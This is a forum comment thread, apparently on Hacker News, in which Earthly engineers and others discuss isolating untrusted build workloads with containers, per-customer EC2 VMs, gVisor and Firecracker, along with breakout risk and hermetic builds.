Thanks for sharing this. One of the authors here. We built a service that execut...

ones_and_zeros · on March 7, 2023

Container break outs are rare and they typically require the attacker being able to control either the container creation parameters and/or the actual image being run. If you control those things and apply process isolation best practices (seccomp, cap drops, etc) then you are in pretty good shape.

Source: ran a container based RCE service that ran millions of arbitrary workloads per month. We had sophisticated network and system anomaly detection, high priced pentesters etc and never had a breakout.

justinclift · on March 8, 2023

> ... never had a breakout.

Would "never detected a breakout" be better wording? :)

ithkuil · on March 8, 2023

> We had sophisticated network and system anomaly detection, high priced pentesters

I assume GP wrote that in order to say that they have a high confidence that they never actually had a breakout.

You are technically correct. But your logic applies to everything. Is the isolation provided by VMs good enough? Is airgapping enough to prevent breakout?

There are many things that factor in when you decide what's reasonable. Some are first principle arguments (containers use the same kernel as the host, the kernel has a large surface area, ...). Others are statistical arguments: there have been past breakouts with this stack, it's thus reasonable to expect more in the future, ...

adamgordonbell · on March 8, 2023

Interesting! What was the service? IN our case we control the container, which is BuildkitD, but it has to be run privileged, which means lots of solutions are off the table.

ones_and_zeros · on March 8, 2023

Rather not say. Yea building and then running containers where users get to pick the base image is a risk.

We found that privileged is a pretty big hammer and thought we needed it too but we found ways to give us the functionality we needed without all the extra stuff we didn't need the privileged brings in.

ithkuil · on March 8, 2023

Have you used things like gvisor?

plicense · on March 7, 2023

I would suggest also looking at https://github.com/bazelbuild/remote-apis. Its essentially a standard API for remote (any binary) execution as a service and there are several reference implementations of it (Buildgrid, BuildBarn, Google's own service etc).

And you can consider using gVisor to minimize container breakouts to a great extent.

adamgordonbell · on March 7, 2023

I'll checkout that remote-apis link.

gVisor was considered but so far it looks like the next iteration with be using firecracker vms. Our backend is buildkit and it can't run in gvisor containers without some work.

ithkuil · on March 8, 2023

Firecracker looks great but it requires bare metal instances or nested virtualization (which is not supported by EC2 instances IIRC).

How do you run firecracker?

iampims · on March 10, 2023

EC2 metal instances are expensive but they let you run FC.

cptnntsoobv · on March 7, 2023

> One cool thing we learned was how quickly you can Hibernate and wake up x86 EC2 instances. That ended up being a game-changer for us.

Could you talk more about it? Are you keeping a cache of hibernated EC2 instances and re-launching them per request? What sort of relaunch latency profile do you see as function of instance memory size?

adamgordonbell · on March 7, 2023

A specific Ec2 instance is always serving one customer max. And builds are highly cachable, so the ec2 instance has an EBS volume on it with a big cache that Earthly uses to prevent rework.

That instance is just sitting around waiting for gRPC requests that tell it to run another build. If it's idle for 30 minutes, it hibernates and then if another call comes back in a gRPC proxy wakes it back up.

I don't know if the wake up time increases per the size of the cache in memory, I can check with Brandon but its much faster starting up an instance cold, mainly because buildkit is designed for throughput and not a quick startup.

There are more details in the blog.

preseinger · on March 7, 2023

how do you prevent build 1 from modifying the VM in a way that impacts build 2?

if a build 1 happens to install a specific libc, do you un-install that libc before running build 2?

if you just say that stuff is the responsibility of the user, okay, but then the artifacts produced by this system aren't deterministic, which seems like a problem?

adamgordonbell · on March 8, 2023

Good question, so the builds are specified in Earthfiles, which are run by our buildkit backend.

Buildkit runs the builds in runC, so basically containers are used to keep things deterministic, but the buildkit backend isn't shared, each is in own EC2 instance.

preseinger · on March 8, 2023

if your security model assumes user code is able to break out of containers, then it also has to assume user code will be able to modify the VM

if user code can modify the VM, and VMs are stateful, then how do you ensure hermetic builds?

adamgordonbell · on March 8, 2023

So the builds are specified in Earthfiles, which are run by our buildkit backend.

Buildkit runs the builds in runC, so basically containers are used to keep things deterministic, but the buildkit backend isn't shared, each is in own EC2 instance.

So if you could break out or access cache entries that weren't correct you would have found a way to break reproducibility, but not access anything you shouldn't.

preseinger · on March 8, 2023

ah, okay, so you're using containers, you're running those containers on VMs that are per-customer rather than shared/multi-tenant, and the post is about optimizing how those VMs are managed -- got it

> but the buildkit backend isn't shared, each is in own EC2 instance

it isn't shared between different customers, but it is shared between different builds for the same customer, right?

iueotnmunto · on March 7, 2023

While container breakouts do happen, they're pretty rare. I'd be more concerned about any potential injection vectors in the go code, which could lead to a cloud breach if you're not careful ;)

raesene9 · on March 7, 2023

There have been a bunch of Linux kernel privesc vulns that can be converted to container breakouts from standard Linux containers, just look at bounties from Google's kCTF (AFAIK they've had 10 different kernel vulns in 2 years)

It's possible to mitigate/reduce them for sure, with appropriate hardening, but the Linux kernel is still quite a big attack surface.

flangola7 · on March 7, 2023

What about kernels like seL4? I think everyone will abandon monolithic kernels one day because they have too much attack surface.

yjftsjthsd-h · on March 8, 2023

Is anyone running normal workloads (node/java/php/python/whatever) on seL4 without sticking Linux in the middle?

adamgordonbell · on March 7, 2023

Oh interesting. What were you imagining as the injection vector?

The earthly backend runs on a modified buildkit so it is running the arbitrary code in a container, but it's also in its own VM. This was simpler then firecracker to get started but turned out to have pretty good performance and alright cost once we started suspending things.

iueotnmunto · on March 7, 2023

More if you're running `provision --vm-name "$UserSuppliedData"` or similar. I don't know how you've built your wrapping tool, so I can't comment on how likely it would be, but I've seen such breakages IRL (I break things for a living ;) )

brandonschurman · on March 7, 2023

Good point, we do have things locked down pretty well in our go code though. The instances can only be provisioned using an API, and that API doesn't allow for arbitrary user-supplied input.

k__ · on March 7, 2023

I had the impression that's what fly.io was doing.

Converting Docker images to run in VMs instead of containers.

slondr · on March 7, 2023

Fly uses Firecracker like AWS Lambda, not full-fledged VMs like EC2.

iampims · on March 8, 2023

That’s not accurate. Fly creates a FC VM from a Dockerfile but injects a pid1 supervisor and behaves more like EC2 than Lambda (no 15 mins execution limit for instance).

xxpor · on March 7, 2023

Did you consider using firecracker?

adamgordonbell · on March 7, 2023

Yeah, we totally did and actually Corey has been playing around with a POC for backing with firecracker. It's likely the next revision of this will use firecracker.

So it wasn't so much disqualified as decided it wouldn't be the v1 solution. We wanted to get something out and get people on it and get feedback. So weren't afraid to spend some more computer dollars to do so.